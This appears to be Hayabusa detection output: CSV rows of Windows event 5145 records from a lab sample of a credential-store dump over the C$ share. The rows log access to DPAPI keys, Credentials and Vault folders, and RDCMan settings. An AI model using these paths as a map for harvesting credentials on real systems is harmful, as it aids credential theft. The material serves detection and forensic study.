0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 
20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.920 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.553 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.584 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.616 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.663 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
